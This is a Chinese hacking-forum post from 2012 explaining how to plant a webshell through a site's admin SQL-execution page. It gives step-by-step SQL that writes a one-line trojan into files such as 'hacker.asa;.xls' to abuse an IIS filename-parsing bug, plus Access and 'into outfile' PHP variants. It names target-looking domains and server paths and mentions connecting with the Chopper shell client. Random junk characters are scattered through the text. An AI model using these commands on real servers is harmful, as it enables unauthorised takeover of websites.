好不容易进了后台,发现啥上传啊。备份啊多木有。9 X1 l- F# A8 F: ]6 v5 P+ y
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的6 j+ p5 c( E& v$ x& ~* Y
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
2 o# a- q0 M# _4 l0 M% {8 V5 F; t然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
1 \' l9 k4 z& @& {: l& A1.create table cmd (a varchar(50))' _+ A! K% z& z; t
2.insert into cmd (a) values (‘‘)
' U3 v0 h9 K6 [/ G- G) I! ~3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
6 _- Y( O% o3 [ E7 {# r' ?- u(把表cmd的内容导出为物理路径的一个EXCEL文件), z P% y F; m
4.drop table cmd6 l/ v! i$ w$ _
利用IIS的BUG成功拿到了WEBSHELL。7 y( C7 c: O3 e0 d$ v
& _/ {$ @! }5 {
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
1 h8 r; D6 i5 T& K) m8 B0 H
1 ?1 {9 ^6 P$ m+ h7 _. R! w* F$ \ SQL语句意思解释:6 o1 T ~9 U$ |/ K) h
第一句2 j/ t& d7 U# \5 _+ K( [
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
% |" E$ f: x1 U- Y# B4 m
& V7 c+ l. i8 M. P 第二句
( y2 U( Y& f' ~0 n- M% m- z 在表cmd的a字段插入一句话木马
. E5 ~% _* ]2 m) c. @( l 第三句4 m% H. B, x" M) L' n
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
3 t+ J& ~% E9 U3 R, |$ C8 N
* _8 R1 U* J, n# C6 g7 W2 U5 N 第四句
n n$ }8 C) H' p% @ 删除建立的cmd表) }/ ~* J0 @8 H* b& x9 G% N) F
o3 E4 Z- |2 E
以下内容为测试:
u% a/ U. V( [- A Access利用后台SQL执行命令功能导出WebShell:
8 J( u) p- l" D& c- c" w 这个更简单:
7 V& J- g1 D5 O2 K [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
5 [$ ^5 d3 [: E0 o$ v# c; L 或者+ R4 v9 \3 h2 j e! K2 |
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
& k* ~ r% ~3 v3 C4 S9 E- v) Q, e7 R# k V# M4 E. \
后台有执行SQL语句功能(vote为已知表段)* j" c/ S# J6 J4 }3 h0 r
希望对大家有所帮助拿shell的又一个思路/ m0 j# y; I* V+ h
|
发表于 2012-9-13 17:53:58
收藏
支持
反对